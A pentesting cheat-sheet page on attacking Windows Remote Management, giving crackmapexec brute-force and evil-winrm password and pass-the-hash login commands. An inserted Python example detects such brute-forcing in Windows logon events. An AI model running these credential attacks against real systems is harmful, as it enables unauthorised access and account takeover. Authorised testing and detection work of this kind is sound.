
5985,5986 - Pentesting WinRM

windows

WinRM is short for Windows Remote Management, a protocol for remote management of Windows systems. It provides a secure and standards-based way for administrators to remotely manage Windows servers, workstations, and other resources, either from the command line or through automation tools such as PowerShell.

crackmapexec


brute-force user / password

crackmapexec winrm $IP -u users.txt -p pass.txt --continue-on-success
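What a run like the one above looks like from the target's Security log, as an added detection example (not part of the original page or of any tool named on it). It assumes the records come from a host where WinRM is the exposed network-logon service; the dictionary layout, addresses, account names and thresholds are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records using Security-log field names.
# 4625 = failed logon, 4624 = successful logon, LogonType 3 = network logon.
# Assumption: events come from a host where WinRM is the exposed service.
def _ev(sec, event_id, ip, user):
    return {"time": "2024-01-10T09:00:" + sec, "EventID": event_id, "LogonType": 3,
            "IpAddress": ip, "TargetUserName": user}

SAMPLE_EVENTS = [
    _ev("01", 4625, "10.0.0.50", "alice"), _ev("02", 4625, "10.0.0.50", "bob"),
    _ev("03", 4625, "10.0.0.50", "carol"), _ev("04", 4624, "10.0.0.50", "svc_backup"),
    _ev("05", 4625, "10.0.0.50", "dave"), _ev("06", 4625, "10.0.0.50", "alice"),
    _ev("07", 4625, "10.0.0.50", "bob"),
    # Benign pattern: one mistyped password, then a normal logon.
    _ev("10", 4625, "10.0.0.20", "erin"), _ev("20", 4624, "10.0.0.20", "erin"),
]

def detect_winrm_bruteforce(events, window=timedelta(minutes=5), min_failures=5, min_users=3):
    """Flag source IPs with a burst of failed network logons across several accounts."""
    by_ip = defaultdict(list)
    for e in events:
        if e["LogonType"] == 3 and e["EventID"] in (4624, 4625):
            by_ip[e["IpAddress"]].append(
                (datetime.fromisoformat(e["time"]), e["EventID"], e["TargetUserName"]))
    findings = []
    for ip, rows in by_ip.items():
        rows.sort()
        fails = [(t, u) for t, eid, u in rows if eid == 4625]
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1  # slide the window forward
            burst = fails[start:end + 1]
            if len(burst) >= min_failures and len({u for _, u in burst}) >= min_users:
                wins = [(t, u) for t, eid, u in rows if eid == 4624 and t >= burst[0][0]]
                findings.append({
                    "ip": ip,
                    "failures": len(fails),  # all failed logons from this source
                    "succeeded": sorted({u for _, u in wins}),
                    # Failures after a success match a tool told to keep going
                    # (the --continue-on-success behaviour).
                    "continued_after_success": bool(wins) and fails[-1][0] > wins[0][0],
                })
                break
    return findings

if __name__ == "__main__":
    for finding in detect_winrm_bruteforce(SAMPLE_EVENTS):
        print(finding)
```

Any account listed under `succeeded` should be treated as compromised and have its credentials rotated, since the source went on to try further accounts after that logon.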

evil-winrm


evil-winrm - with password

evil-winrm -u $USER -p $PASS -i $IP

evil-winrm - with hash

evil-winrm -u <username> -H <Hash> -i <IP>


  • https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm